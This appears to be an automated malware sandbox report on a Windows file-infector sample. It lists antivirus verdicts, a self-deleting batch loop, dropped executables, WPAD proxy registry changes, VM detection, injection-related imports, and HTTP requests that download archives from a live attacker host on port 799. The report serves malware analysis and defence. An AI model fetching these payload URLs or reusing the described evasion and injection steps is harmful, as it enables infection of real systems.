6.2
高危
61 个模型检测该样本为恶意!
重新分析
更多

73bf72b0e48735a2d89522d5814b85f559cb0806492f1c2103a6c5e27f90103e

008865194dc0e31e46eaa1117cf16a0c.exe

分析耗时

39s

最近分析

文件大小

479.5KB
静态报毒 动态报毒 A + W32 AI SCORE=87 AUTOINFECTOR BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE INFECTED JADTRE KA@558NXG KCLOUD KUDJ LOADER MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SCORE SMALL STATIC AI TRIUSOR UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Virus:Win32/Nimnul.a51285b3 20190527 0.3.0.5
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Kingsoft Win32.Infected.AutoInfector.a.(kcloud) 20201211 2017.9.26.565
McAfee W32/Kudj 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_90% (W) 20190702 1.0
静态指标
Command line console output was observed (50 out of 394 个事件)
Time & API Arguments Status Return Repeated
1619134510.552119
WriteConsoleA
buffer: Usage:
console_handle: 0x0000000b
success 1 0
1619134510.552119
WriteConsoleA
buffer: DRkill [-help] [-quiet] [-pid n] [-exe name] [-underdr] [-v]
console_handle: 0x0000000b
success 1 0
1619135819.898001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135819.898001
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619135819.898001
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135819.992001
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe
console_handle: 0x00000007
success 1 0
1619135820.023001
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619135820.054001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.054001
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619135820.054001
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.054001
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619135820.054001
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619135820.086001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.086001
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619135820.086001
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.133001
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe
console_handle: 0x00000007
success 1 0
1619135820.148001
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619135820.164001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.164001
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619135820.179001
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.179001
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619135820.179001
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619135820.226001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.242001
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619135820.242001
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.289001
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe
console_handle: 0x00000007
success 1 0
1619135820.289001
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619135820.304001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.320001
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619135820.320001
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.336001
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619135820.336001
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619135820.367001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.367001
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619135820.383001
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.414001
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe
console_handle: 0x00000007
success 1 0
1619135820.414001
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619135820.429001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.445001
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619135820.445001
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.445001
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619135820.445001
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619135820.476001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.476001
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619135820.508001
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
1619135820.586001
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe
console_handle: 0x00000007
success 1 0
1619135820.601001
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619135820.617001
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619135820.617001
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619135820.617001
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\IsbWmc.exe"
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 个事件)
pdb_path D:\derek\dr\build_package\build_drmemory-release-32\dynamorio\bin32\DRkill.pdb
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 个事件)
section P^E\xe0\xa3u}
行为判定
动态指标
Creates executable files on the filesystem (21 个事件)
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\2D4B74B0.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\0A407398.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\2d105170.bat
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\16F74FAF.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\53A84868.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\42A6122C.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\26D32D1A.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\IsbWmc.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\2d105170.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\IsbWmc.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619134528.906886
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\2d105170.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\2d105170.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619134512.093886
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 6.934657779193628 section {'size_of_data': '0x00004200', 'virtual_address': '0x0007a000', 'entropy': 6.934657779193628, 'name': 'P^E\\xe0\\xa3u}', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
网络通信
Communicates with host for which no DNS query was performed (2 个事件)
host 172.217.24.14
host 58.63.233.69
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (8 个事件)
Time & API Arguments Status Return Repeated
1619134514.687886
RegSetValueExA
key_handle: 0x00000410
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619134514.687886
RegSetValueExA
key_handle: 0x00000410
value: RŸ±7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619134514.687886
RegSetValueExA
key_handle: 0x00000410
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619134514.687886
RegSetValueExW
key_handle: 0x00000410
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619134514.687886
RegSetValueExA
key_handle: 0x000003f0
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619134514.687886
RegSetValueExA
key_handle: 0x000003f0
value: RŸ±7×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619134514.687886
RegSetValueExA
key_handle: 0x000003f0
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619134514.734886
RegSetValueExW
key_handle: 0x000000d8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 61 AntiVirus engines on VirusTotal as malicious (50 out of 61 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
DrWeb BackDoor.Darkshell.246
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.008865194dc0e31e
Qihoo-360 Virus.Win32.Agent.P
ALYac Win32.VJadtre.3
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.a51285b3
K7GW Virus ( 0040f7441 )
Cybereason malicious.94dc0e
Arcabit Win32.VJadtre.3
BitDefenderTheta AI:FileInfector.991137D00F
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
APEX Malicious
Avast Other:Malware-gen [Trj]
ClamAV Win.Malware.Triusor-6793891-0
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
Paloalto generic.ml
ViRobot Win32.Ramnit.F
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
Baidu Win32.Virus.Otwycal.d
VIPRE Virus.Win32.Small.acea (v)
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Infected.gm
Emsisoft Win32.VJadtre.3 (B)
SentinelOne Static AI - Malicious PE
Jiangmin Win32/Nimnul.f
Avira W32/Jadtre.B
MAX malware (ai score=87)
Antiy-AVL Virus/Win32.Nimnul.f
Kingsoft Win32.Infected.AutoInfector.a.(kcloud)
Gridinsoft Trojan.Heur!.03002201
Microsoft Virus:Win32/Mikcer.B
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
Cynet Malicious (score: 100)
AhnLab-V3 Win32/VJadtre.Gen
McAfee W32/Kudj
TACHYON Virus/W32.Ramnit.C
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2016-08-29 15:12:06

Imports

Library ADVAPI32.dll:
0x473350 OpenProcessToken
0x473354 OpenThreadToken
0x473364 RegDeleteKeyW
0x473368 RegCloseKey
0x47336c RegCreateKeyExW
0x473370 FreeSid
0x473374 SetEntriesInAclW
0x47337c LookupAccountNameW
0x473380 AddAccessAllowedAce
0x473384 InitializeAcl
0x473388 GetLengthSid
0x47338c RegSetKeySecurity
0x4733a0 RegOpenKeyExW
0x4733a4 GetSecurityInfo
0x4733a8 RegEnumKeyExW
0x4733ac RegEnumValueW
0x4733b0 RegDeleteValueW
0x4733b4 RegQueryValueExW
0x4733b8 RegSetValueExW
0x4733bc RegOpenKeyW
0x4733c0 CloseEventLog
0x4733c4 ReadEventLogW
0x4733d4 OpenEventLogW
0x4733d8 ClearEventLogW
Library KERNEL32.dll:
0x473424 GetLastError
0x473428 ReadProcessMemory
0x47342c CloseHandle
0x473430 OpenProcess
0x473434 GetProcAddress
0x473438 GetModuleHandleW
0x47343c TerminateProcess
0x473440 SleepEx
0x473444 GetCurrentProcess
0x473448 GetCurrentThread
0x47344c FindClose
0x473450 FindFirstFileW
0x473454 MoveFileExW
0x473458 MoveFileW
0x47345c DeleteFileW
0x473460 LocalFree
0x473464 GetShortPathNameW
0x473468 GetSystemDirectoryW
0x47346c CreateDirectoryW
0x473470 RemoveDirectoryW
0x473474 FindNextFileW
0x473478 LocalAlloc
0x47347c GetExitCodeProcess
0x473480 WaitForSingleObject
0x473484 CreateProcessW
0x473488 CopyFileW
0x47348c ResumeThread
0x473490 GetThreadContext
0x473494 CreateThread
0x473498 VirtualFreeEx
0x47349c WriteProcessMemory
0x4734a0 VirtualProtectEx
0x4734a4 VirtualAllocEx
0x4734a8 CreateRemoteThread
0x4734ac CreateFileW
0x4734b4 FormatMessageW
0x4734b8 LoadLibraryExW
0x4734bc CreateEventW
0x4734c0 GetCurrentProcessId
0x4734c4 HeapFree
0x4734c8 HeapAlloc
0x4734cc GetProcessHeap
0x4734d0 ExitProcess
0x4734d4 DecodePointer
0x4734e0 GetCommandLineA
0x4734e4 HeapSetInformation
0x4734e8 MultiByteToWideChar
0x4734ec ReadFile
0x4734f0 GetFileType
0x4734f4 GetStringTypeW
0x473500 FatalAppExitA
0x473504 EncodePointer
0x47350c FreeLibrary
0x473510 InterlockedExchange
0x473514 LoadLibraryW
0x473518 GetLocaleInfoW
0x473524 IsDebuggerPresent
0x473528 TlsAlloc
0x47352c TlsGetValue
0x473530 TlsSetValue
0x473534 TlsFree
0x47353c SetLastError
0x473540 GetCurrentThreadId
0x473548 WriteFile
0x47354c GetStdHandle
0x473550 GetModuleFileNameW
0x473554 SetHandleCount
0x473558 GetStartupInfoW
0x47355c Sleep
0x473560 GetModuleFileNameA
0x473568 WideCharToMultiByte
0x473570 HeapCreate
0x473574 HeapDestroy
0x47357c GetTickCount
0x473588 GetCPInfo
0x47358c GetACP
0x473590 GetOEMCP
0x473594 IsValidCodePage
0x473598 LCMapStringW
0x47359c GetConsoleCP
0x4735a0 GetConsoleMode
0x4735a4 RtlUnwind
0x4735a8 SetStdHandle
0x4735ac SetFilePointer
0x4735b0 SetEndOfFile
0x4735b4 HeapSize
0x4735b8 HeapReAlloc
0x4735bc FlushFileBuffers
0x4735c0 WriteConsoleW
0x4735c4 GetUserDefaultLCID
0x4735c8 GetLocaleInfoA
0x4735cc EnumSystemLocalesA
0x4735d0 IsValidLocale

Hosts

No hosts contacted.

TCP

Source Source Port Destination Destination Port
192.168.56.101 49179 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49180 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49181 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49182 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49183 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49184 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49185 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49186 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49189 63.251.106.25 ddos.dnsnb8.net 799
192.168.56.101 49191 63.251.106.25 ddos.dnsnb8.net 799

UDP

Source Source Port Destination Destination Port
192.168.56.101 50534 114.114.114.114 53
192.168.56.101 51808 114.114.114.114 53
192.168.56.101 55368 114.114.114.114 53
192.168.56.101 56539 114.114.114.114 53
192.168.56.101 57874 114.114.114.114 53
192.168.56.101 58367 114.114.114.114 53
192.168.56.101 63429 114.114.114.114 53
192.168.56.101 137 192.168.56.255 137
192.168.56.101 138 192.168.56.255 138
192.168.56.101 123 20.189.79.72 time.windows.com 123
192.168.56.101 51378 224.0.0.252 5355
192.168.56.101 51963 224.0.0.252 5355
192.168.56.101 56804 224.0.0.252 5355
192.168.56.101 62191 224.0.0.252 5355
192.168.56.101 65004 224.0.0.252 5355
192.168.56.101 1900 239.255.255.250 1900
192.168.56.101 51379 239.255.255.250 3702
192.168.56.101 56540 239.255.255.250 3702
192.168.56.101 56807 239.255.255.250 1900
192.168.56.101 58707 239.255.255.250 3702

HTTP & HTTPS Requests

URI Data
http://ddos.dnsnb8.net:799/cj//k1.rar 
GET /cj//k1.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive
http://ddos.dnsnb8.net:799/cj//k2.rar 
GET /cj//k2.rar HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: ddos.dnsnb8.net:799
Connection: Keep-Alive

ICMP traffic

No ICMP traffic performed.

IRC traffic

No IRC requests performed.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Snort Alerts

No Snort Alerts

Sorry! No dropped files.
Sorry! No dropped buffers.